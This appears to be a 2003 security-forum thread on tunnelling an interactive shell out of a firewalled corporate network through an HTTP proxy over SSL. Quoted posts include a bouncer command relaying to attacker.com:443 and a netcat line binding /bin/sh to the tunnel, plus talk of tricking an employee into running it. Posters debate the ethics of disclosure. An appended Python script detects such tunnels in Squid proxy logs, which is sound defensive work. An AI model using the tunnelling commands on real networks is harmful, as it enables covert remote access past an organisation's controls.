-
October 31st, 2003, 11:04 PM
#11
Member
Yay.. problem fixed..
[pong][shadow]Why won't anyone give me greenies???[/shadow] [/pong]
-
October 31st, 2003, 11:41 PM
#12
I kind of made this point in a thread that many probably can't see, so I'll make it here.....
One of the reasons I come here is because there are several hundred "heads" all looking at the same problem, (computer security, in case anyone forgot..... ). We all can't think of everything but when you have all these "heads" looking at all the many facets of computer security it sure helps out.
So this post was of use..... I hadn't thought about it..... but then my users wouldn't know netcat if it jumped up and slapped them in the face..... But it's something I will bear in mind for the future should I choose to implement the kind of architecture nlxoo describes......
Girls and Boys..... Information is power..... Ignorance may be bliss, but it sure sucks when you stand in front of the CEO who is asking "how did this happen"? If nlxoo came here to disseminate this information with malicious intent then more fool him, he helped the people who are "on the other team", if he came here to bring something to "the other team's" attention then more power to him. Negging him for shedding light on how to act nefariously, whatever his intent, is kind of self defeating on a security site, don't you think?
Don't SYN us.... We'll SYN you.....
"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools." - Thucydides
-
October 31st, 2003, 11:53 PM
#13
I couldn't agree with you more, TS. I for one want to know what can be done to my network.
Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”
-
November 1st, 2003, 03:26 AM
#14
Re: Gaining an interactive shell through SSL tunneling
Originally posted here by nlxoo
Step 2:
On victim.company.com, the attacker executes:
Code:
bouncer.exe --bind 127.0.0.1 --port 9999 --destination attacker.com:443 --tunnel proxy.company.com:8080
If you can already do this, then what exactly are you gaining, you've already got shell access. Hell, from here, you can install whatever you want. And whatever remote admin tool you'd like. At that, I wouldn't set netcat to listen on my own box. That's just an invitation for someone else to check out your box.
You should mention this type of stuff, nice tutorial anyways.
--PuRe
-
November 1st, 2003, 04:12 AM
#15
I don't think the tutorial's purpose was to gain remote access, but just how to encrypt your traffic once you compromise the host.
-
November 1st, 2003, 04:17 AM
#16
Well, cheers to this. I definitely did not know that could be done. Thanks for the info. It shows, though, that it is a Win XP computer. Is it only for XP or possible on others?
PeacE
-BoB
#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)
-
November 1st, 2003, 05:34 AM
#17
Junior Member
Re: Re: Gaining an interactive shell through SSL tunneling
Originally posted here by PuReExcTacy
If you can already do this, then what exactly are you gaining, you've already got shell access. Hell, from here, you can install whatever you want. And whatever remote admin tool you'd like.
But what if the victim's machine (10.0.4.15) is on a LAN and has no full Internet access except access to a single HTTP proxy server (10.0.0.4) for web browsing?
It's impossible to run a trojan/backdoor on the victim's machine and expect to connect or even reach the victim's machine from outside the LAN.
This method is for a hacker who already has physical access to the firewalled host, e.g. an employee of a company who wants access to his work workstation from home OR a hacker who fools an employee of the company to download and execute a program that is programmed to automatically carry out steps 2 & 3.
Originally posted here by PuReExcTacy
At that, I wouldn't set netcat to listen on my own box. That's just an invitation for someone else to check out your box.
eh? The netcat running on the attacker's host? That only opens port 443 and waits for someone to connect to the port. Not serving any data.
Originally posted here by fl34bit3
Thanks for the info. It shows, though, that it is a Win XP computer. Is it only for XP or possible on others?
This method will work on Windows 2000 but not on the Windows 9x series.
I did try it on a Linux host but the Linux port of Bouncer gave me a "Segmentation Fault" error.
But in theory, it should work on Linux if you do this instead for Step 3:
Code:
./nc -e /bin/sh 127.0.0.1 9999
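Seen from the proxy administrator's side, the scenario discussed in this thread (a workstation whose only way out is the HTTP proxy, holding a tunnel open to an outside host on port 443) leaves CONNECT entries in the proxy log. The following is an added example, not part of any post in the thread: it assumes Squid's native access.log format, and the sample lines, thresholds and the function name suspicious_tunnels are constructed for illustration.

```python
import re

# Constructed Squid native-format access.log lines (sample data, not from the thread):
# time  elapsed_ms  client  action/status  bytes  method  URL  ident  peer  type
SAMPLE_LOG = """\
1067641200.120    842 10.0.4.22 TCP_MISS/200 15320 GET http://intranet.example/index.html - DIRECT/192.0.2.10 text/html
1067641260.450   3150 10.0.4.22 TCP_TUNNEL/200 48211 CONNECT shop.example:443 - DIRECT/192.0.2.20 -
1067648400.900 7200345 10.0.4.15 TCP_TUNNEL/200 91377 CONNECT 203.0.113.7:443 - DIRECT/203.0.113.7 -
1067648500.010    95 10.0.4.31 TCP_DENIED/403 1200 CONNECT 203.0.113.9:22 - NONE/- text/html
"""

LINE = re.compile(
    r"^\d+\.\d+\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+\w+/(?P<status>\d{3})\s+"
    r"(?P<bytes>\d+)\s+(?P<method>\S+)\s+(?P<url>\S+)")
BARE_IP = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

def suspicious_tunnels(log_text, max_ms=30 * 60 * 1000, allowed_ports=(443,)):
    """Return CONNECT requests matching any heuristic (thresholds are assumptions)."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m or m["method"] != "CONNECT":
            continue
        host, _, port = m["url"].rpartition(":")
        if not port.isdigit():
            continue
        reasons = []
        # Heuristic 1: CONNECT to a port the policy does not allow.
        if int(port) not in allowed_ports:
            reasons.append(f"port {port} not in allow-list")
        # Heuristic 2: browsers normally CONNECT to hostnames, not raw addresses.
        if BARE_IP.match(host):
            reasons.append("destination is a bare IP, not a hostname")
        # Heuristic 3: an established tunnel held open far longer than a page load.
        if m["status"] == "200" and int(m["elapsed"]) >= max_ms:
            reasons.append(f"tunnel open {int(m['elapsed']) // 60000} min")
        if reasons:
            findings.append({"client": m["client"], "dest": m["url"],
                             "status": m["status"], "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in suspicious_tunnels(SAMPLE_LOG):
        print(f["client"], "->", f["dest"], f["status"], "; ".join(f["reasons"]))
```

Each hit is a lead to review rather than proof; long downloads and some legitimate clients also hold CONNECT sessions open.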